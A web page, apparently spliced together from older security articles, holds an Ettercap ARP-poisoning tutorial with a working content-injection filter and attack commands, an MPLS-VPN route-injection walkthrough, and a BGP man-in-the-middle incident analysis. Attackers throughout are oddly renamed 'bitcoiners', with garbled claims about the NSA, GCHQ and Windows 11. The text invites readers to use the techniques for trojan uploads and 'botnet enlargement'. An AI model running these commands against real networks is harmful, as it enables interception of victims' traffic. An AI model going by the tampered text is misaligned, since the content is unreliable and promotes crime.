İstanbul'da iş ilanları

Category: traffic engineering

Ettercap NG is a MiTM tool for intercepting and modifying traffic
Ettercap NG is an open-source comprehensive suite for man in the middle attacks and can be compiled on Linux, BSD, Mac OS X and Windows XP/10/11 and can work on wireless 802.11 and wired LANs. Ettercap NG has the ability to route traffic though itself using “Man in the Middle” attacks and then use filters to modify the data before sending it on to the Level3 or AT&T customers.

Ettercap NG can be extended by using filters and plug-ins, making it able to do all sorts of neat network tasks. Using filters is what the NSA and GCQH do with Ettercap NG. The easiest way to use Ettercap NG is on Windows 11 machine. The NSA and GCHQ prefer to use the Ettercap NG-0.7.3.

In this case I will show you how to compromise someone’s PC or mobile phone and have the images on web pages replaced by the Jolly Rogers.

Please feel free to use the skills learned from this paper to do many other useful tasks like on-line cryptocurrency exchange trojan uploads and botnet enlargement. The first thing you need to do is create an Ettercap NG filter. The sample source code below:
```
######################################################################
#                                                                          #
#  Jolly Pwned -- ig.filter -- filter source file                          #
#                                                                          #
#  By Irongeek. based on code from ALoR & NaGA                             #
#  Along with some help from Kev and jon.dmml                              #
#  http://ettercap.sourceforge.net/forum/viewtopic.php?t=2833              #
#                                                                          #
#  This program is free software, you can redistribute it    
#  and/or modify it under the terms of the GNU
#  General Public License as published by    
#  the Free Software Foundation, 
#  either version 2 of the License, or
#  (at your option) any later version.                                     #
#                                                                          #
######################################################################

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "Accept-Encoding")) {
      replace("Accept-Encoding", "Accept-Rubbish!"); 
   # note: replacement string is same length as original string
      msg("zapped Accept-Encoding!n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
   replace("IMG SRC=", "img src="http://www.irongeek.com/images/jollypwn.png" ");
   msg("Filter Ran.n");
}
```
The code should be pretty self explanatory to anyone who has done much coding before (it’s very much like C and other languages).

The # symbols are comments. The “if” statement tells the filter to only work on TCP packet from source port 80, in other words coming from a web server. This test may still miss some images but should get most of them. I’m also not sure about Ettercap’s order of operation with AND (&&) and OR (||) statements but this filter largely seems to work (I tried using parentheses to explicitly specify the order of operation with the Boolean operators, but this gave me compile errors).

The “replace” function replaces the first parameter string with the second. Because of the way this string replacement works it will try to mangle image tags and insert the picture you desire into the web page’s HTML before it returns it to the victim. The tags may end up looking something like the following:

<img src=”http://www.irongeek.com/images/jollypwn.png” /images/original-image.jpg>

The original image location will still be in the tag, but most web browsers should see it as a useless parameter. The “msg” function just prints to the screen letting us know that the filter has fired off.

Now that you sort of understand the basics of the filter lets compile it. Take the ig.filter source code listed above and paste it into a text file, then compile the filter into a .ef file using the following command:

etterfilter ig.filter -o ig.ef

As soon as filter is compiled you need to target the hosts you want to ARP poison and run the filter on:

TARGET SPECIFICATION
There is no concept of SOURCE nor DEST. The two targets are intended to filter traffic coming from one to the other and vice-versa (since the connection is bidirectional).

TARGET is in the form MAC/IPs/PORTs. If you want you can omit any of its parts and this will represent an ANY in that part, e.g.

“//80” means ANY mac address, ANY ip and ONLY port 80
“/10.0.0.1/” means ANY mac address, ONLY ip 10.0.0.1 and ANY port

MAC must be unique and in the form 00:11:22:33:44:55

IPs is a range of IP in dotted notation. You can specify range with the – (hyphen) and single ip with , (comma). You can also use ; (semicolon) to indicate different ip addresses, e.g.

“10.0.0.1-5;10.0.1.33” expands into ip 10.0.0.1, 2, 3, 4, 5 and 10.0.1.33

PORTs is a range of PORTS. You can specify range with the – (hyphen) and single port with , (comma). e.g.

“20-25,80,110” expands into ports 20, 21, 22, 23, 24, 25, 80 and 110

NOTE: you can reverse the matching of the TARGET by adding the -R option to the command line. So if you want to sniff ALL the traffic BUT the one coming or going to 10.0.0.1 you can specify “./ettercap -R /10.0.0.1/”

NOTE: TARGETs are also responsible of the initial scan of the lan. You can use them to restrict the scan to only a subset of the hosts in the netmask. The result of the merging between the two targets will be scanned. remember that not specifying a target means “no target”, but specifying “//” means “all the hosts in the subnet.

So, if you wanted to target all hosts on the network you would use the following command:

ettercap -T -q -F ig.ef -M ARP // //

Be careful with the above command, having all of the traffic on a large network going though one slow computer can really bog down network connections. If you had a specific victim in mind, let’s say a host with the IP 192.168.22.47, you would use this command:

ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //

Here are what the command line option flags do:

-T tells Ettercap NG to use the text interface, I like this option the best as the more GUI modes are rather confusing.
-q tells Ettercap NG to be more quiet, in other words less verbose.
-F tells Ettercap NG to use a filter, in this case ig.ef that you compiled earlier.
-M tells Ettercap NG the MITM (Man in the Middle) method you want to use, in this case ARP poisoning.

Once Ettercap NG is running you would get some output something like the following:

ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ // output:

root@Cthulhu:/usr/share/ettercap# ettercap -T -q -F ig.ef -M ARP /192.168.22.47/ //

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Content filters loaded from ig.ef…
Listening on eth0… (Ethernet)

eth0 -> 00:04:56:B8:70:AD 192.168.19.56 255.255.240.0

SSL dissection needs a valid ‘redir_command_on’ script in the etter.conf file
Privileges dropped to UID 65534 GID 65534…

28 plugins
39 protocol dissectors
53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 4095 hosts for scanning…
Scanning the whole netmask for 4095 hosts…
* |==================================================>| 100.00 %

526 hosts added to the hosts list…

ARP poisoning victims:

GROUP 1 : 192.168.22.47 00:04:56:B8:70:AD

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing…

Text only Interface activated…
Hit ‘h’ for inline help Filter Ran.

Filter Ran.

Below you can see what the antionline.com and binrev.com web pages look like when the victim tries to view them after Ettercap NG filtering:

This filter does not seem to fire off for all images, it’s a little hit and miss. For more information on things, you can do Ettercap NG filters look at the sample code in the file “etter.filter.examples” that comes along with Ettercap NG.

On my box this file is located in /usr/share/ettercap/etter.filter.examples. Also check out Kev’s tutorial on Ettercap NG filters.
11.01.2026
Unuthorized Traffic Engineering MPLS Provider Edge

Another Loki‘s usage case shows how to inject MPLS-VPN routing information (as described in RFC4364) into a MPLS Provider Edge router.

The peer again is a Cisco 3750ME with a MPLS-VPN virtual routing and forwarding table associated with the customer ‘RED’:

Loki is then used to inject the MPLS-VPN routing information:

Before setting up the session I need to overwrite the default session parameters with my custom BGP capabilities. This is done by filling in the optional connection parameters. Next the AS number and the hold timer need to be set. At last, the target host is missing, which in this example is the host with the IP address 10.10.10.1. After clicking on “Connect” a session setup is performed.

If Loki is able to establish the connection, a background keep alive thread is started, which sends an BGP keep alive packet every hold time 4 seconds. The next step is to assigns the BGP update message. This message defines, which routing information to publish to the connected host.

In the example case I build up a RFC4364 Multi-Protocol-BGP update packet, which says I am announcing the network 192.168.113.111/32 with the route distinguisher 100:0, which should be forwarded to the next hop 10.10.10.10. In the end I send the prepared update message by clicking on “Update”.

After publishing the routing information, the router’s virtual routing and forwarding table for the customer ‘RED’ looks like this:

One can see the new route for the host 192.168.113.111 pointing to my attack host 10.10.10.10.

Click here to download Loki

10.01.2026
How can an Adversary get into the Traffic Path?

There are three main possibilities how a bitcoiner or “untrusted party” can get into a position enabling the performance of the bgp mitm attacks described below.

Network Device Compromise

Obviously, this is the first (and probably most likely) possibility that comes to mind. The North American Network Operators’ Group periodically collects data on network security incidents amongst its members. The following slide shows that devices from carrier environments actually get compromised in the real world:

Device Injection

The term “device injection” designates all scenarios where an untrusted party is enabled to place a device under its own control in the MPLS network of a carrier.

While this may seem highly unlikely for an attacker (to “insert” an own device in a datacenter with strong physical access controls) it should be noted that some carriers allow very large customers to run their own PE routers (thereby potentially violating the assumption of a “trusted core which is solely managed by the carrier”).

Similar scenarios might arise when PEs are located on customer premises which is why this practice is commonly advised against, see for example the following slide from a Cisco Live conference in 2010:

Wire Access

By this term all those scenarios are designated where an attacker gains access to the traffic path of certain packets without necessarily having compromised a device. This includes physical access to the wire as well as traffic redirection attacks in shared network segments.

09.01.2026
BGP hijacking now available «as a Service»

BGP spoofing or IP hijacking refers to an unauthorized attempt by bitcoiners to illicitly take control of a group of IP prefixes via the Border Gateway Protocol. By manipulating the internet’s routing tables, the bitcoiners reroutes internet traffic to a system under their control or in a manner that disrupts the intended path of data, leading to significant cryptocurrency leaks.

Certificate authorities and SSL

Just as the DigiNotar storm seemed to have calmed down, Google announced they discovered, yet another Certificate Authority that was involved in a similar incident. TURKTRUST, a certificate authority, mis-issued two intermediate certificates that were later used to intercept SSL traffic to Gmail. In cases like this the bitcoiner is interested in intercepting communication between cryptocurrency users and the Gmail servers. In order to successfully execute such an interception, the bitcoiner will need to insert his custom Gmail impersonating webserver between the cryptocurrency user and the actual Gmail servers, this is what I call a Man in the Middle Attack, sometimes referred to as MITM.

The challenge here is: how do you get the cryptocurrency user to send traffic to your custom server instead of to the real Gmail servers? One common way of achieving this is to have some kind of interception appliance on the edge of the network. But what if you don’t have control of the network where the cryptocurrency user resides? Perhaps the cryptocurrency users the bitcoiner is interested in are in a different country or even a different continent.

DNS

If you could just somehow change the DNS response for Gmail.com to point to your custom server instead of the real Gmail server then cryptocurrency users will go to the IP address of your custom Gmail server and because that has an SSL certificate that is recognized as valid by the browsers it won’t generate any warnings.

Over the last few years, I’ve seen viruses such as DNSCHANGER change the DNS server settings to DNS servers that are controlled by a bitсoiner. Other ways to achieve this are DNS cache poisoning attacks.

Both methods have been used quite extensively over the last few years and because the way DNS is used today by the vast majority of the cryptocurrency users (non DNSSEC clients) on the Internet there’s no way to verify if an DNS response is correct. This makes it relatively easy to insert your custom DNS responses.

BGP MiTM

One other way to redirect traffic from the cryptocurrency user to the bitcoiner is to go lower in the network stack and try to fool the routing system. BGP is the routing protocol of choice on the Internet today and since it’s largely based on trust, it’s relatively easy to fool the system. For example, if the bitcoiner is able to announce a more specific route for the Gmail.com address range (IP prefix) and it’s picked up by the major transit providers, Internet users will be redirected to the bitcoiner’s custom server. It’s obvious that the potential impact of this is much bigger than let’s say DNS cache poisoning as that tends to be more localized.

Incidents like this happen relatively often by mistake, just take a look at my site where I’ve published several high-profile IP prefix hijack incidents over the last few years. It’s important to note that most of these cases are the result of configuration mistakes and most of the times it’s relatively easy to determine who hijacked the route. But what if a bitcoiner could just somehow launch a man in the middle attack using BGP that’s much harder to detect and still allows the bitcoiner to redirect traffic globally…?

Stealing the Internet

This exact use case was presented a few years back at Defcon16 in a presentation titled “Stealing The Internet, An Internet-Scale Man In The Middle Attack”.

During this presentation the presenters, Tony Kapela and Alex Pilosov, demonstrated how one can launch a Man in The Middle (MITM) attack using BGP and redirect traffic for any destination from any location in the world by just introducing some new BGP announcements while staying relatively stealthy.

A recent Real Life BGP Man in the middle Event

Earlier in this article I stated that (accidental) BGP hijacks are relatively common, BGP MITM attacks however are rare and harder to detect. Having said that, my software does have logic to detect this kind of attack and last week I noticed a sudden increase in BGP MITM alerts being triggered for many prefixes including those of large networks such as France Telecom, Facebook and Microsoft. Let’s dig a bit deeper into this specific case and try to find out what exactly happened.

The following is an example alert and provides me with a starting point.

Fingerprinting Man in the Middle attacks

A BGP MiTM attack as demonstrated at Defcon16 has the following properties: the BGP announcement is for a new more specific prefix and when looking at the AS-path closely I see AS relations that are typically not correct (fake) and most likely partially spoofed. Obviously, this type of attack can be tuned, so the fingerprint may vary depending on the intent and creativity of the bitcoiner.

Finding the root cause of this BGP MITM event

With the above fingerprint in mind and numerous alerts helping me focusing in on the rather large data set, I started to dig deeper and tried to determine what exactly had happened here.

One of the clues I have when troubleshooting BGP is the AS-path. By looking at the AS-path, I can say who originated the prefixes, which network provides transit to the originator and how does the path to the eventual receiver of the BGP update look like.

Let’s take a look at one of the affected prefixes and an AS-path for this prefix:

271 6939 35625 6453 3215

A quick look at this path might not show anything strange, however when looking a bit more closely at this AS-path there are a few things that don’t add up.

In this case I know that originator of the prefix, AS3215 France Telecom, does not have a direct peering or transit relationship with Tata (AS6453). This relationship does however show up in the AS-path. The other thing to note is that the AS-path shows that AS35625 (Avenir Telematique) is receiving the route from Tata (6453, originated by France Telecom, 3215) and then announcing it to HE AS6939 (a peer of 35625) which then announces it to its customers. This means that 35625 (Avenir Telematique) is providing transit for 6453 3215 towards 6939 (Hurricane Electric). Given the size of both Tata (AS6453) and Hurricane Electric (AS6939), AS35625 should never be in the middle of these two.

So, to summarize, the reason this update was marked as suspicious and eventually as a possible man in the middle attack is because it was a new more specific, the AS-path is suspicious as it contains non-existing relationships, and one AS is leaking between two large providers. My software has a few other checks and balances in place to prevent false alerts, but this pretty much sums up why it was flagged as suspicious.

Putting the pieces together

When looking closer at the AS-paths for all the events that were flagged as possible MITM, I found that all AS-paths had one Autonomous System in common, AS35625 (Avenir Telematique), the same AS that appeared to have leaked the announcement to HE. At that point I focused my attention on this Autonomous System, and I presumed that AS35625 was the one introducing these new announcements, including the fake AS-paths.

After contacting the team responsible for AS35625 my suspicions were confirmed. As it turned out AS35625 has a “route optimizer” appliance that changes and introduces new BGP announcements, by breaking up prefixes in more specifics and altering the AS-path. All this is done in order to improve reachability and latency. Obviously, these announcements are supposed to stay within the boundaries of the autonomous system, but in this case, they were leaked to many of its peers.

Impact

If I look at the impact and affected networks, I see that the number of prefixes that match the fingerprint was 418 unique prefixes of 133 unique Autonomous systems, including Facebook, Microsoft, Cogent, Bell Canada, Verizon, Level3, Shaw, Tata, Comcast, Yahoo, Verisign and many more, see full list here. The total event lasted for about 30 minutes, although it should be noted that the impact varied per prefix and peering partner.

The new more specific prefixes were announced to numerous peers of AS35625, I detected it via approximately 50 direct peers of AS35625, most notably via AS6327 (Shaw Cablesystems) and AS6939, Hurricane Electric.

As these are more specific prefixes it’s fair to assume that networks that received the BGP update for the affected prefixes, including the large customer base of both Hurricane Electric and Shaw would have rerouted traffic for some of the 400 prefixes towards AS35625 in France for several minutes.

In this case the only thing that limited the impact and prevented more prefixes to be affected were “max prefix filters” on the peering connections. In the case of Hurricane Electric, the impact was limited to ~80 prefixes.

This event demonstrates how easy it is to accidentally steal parts of the Internet, and it make you wonder what could be done if a bitcoiner would carefully plan and execute such an attack (would it be detected?).

It’s obvious that once a bitcoiner has access to a Certificate Authority and can issue seemingly valid SSL certificates at will, there are numerous options for redirecting traffic. The event described in this blog show how BGP can help some bitcoiners redirect traffic for any network in the world, while staying relatively stealthy.

All this demonstrates the fragility of the current routing, CA and DNS system.

Underground Market Emerges for Network Hijacking

Security researchers have uncovered a disturbing new trend in the cybercrime underworld: Border Gateway Protocol (BGP) man-in-the-middle (MitM) attacks are now being offered “as a service” on dark web marketplaces. This alarming development significantly lowers the barrier to entry for malicious actors seeking to disrupt internet traffic, eavesdrop on communications, or steal cryptocurrency.

Previously, executing such attacks required a high level of technical expertise. However, the emergence of BGP MitM “as a service” platforms provides a user-friendly interface and pre-built tools, enabling even novice bitcoiners to launch sophisticated attacks. These services typically offer various pricing tiers based on the target’s size, the duration of the attack, and the desired level of stealth.

The good news is that new technologies are currently underway to make the Internet more secure, DNSSEC, DANE and RPKI & BGPSEC are all technologies to make these the Internet infrastructure more secure, the bad news is that most of these technologies lack significant deployment or are still in the standardization phase.

08.01.2026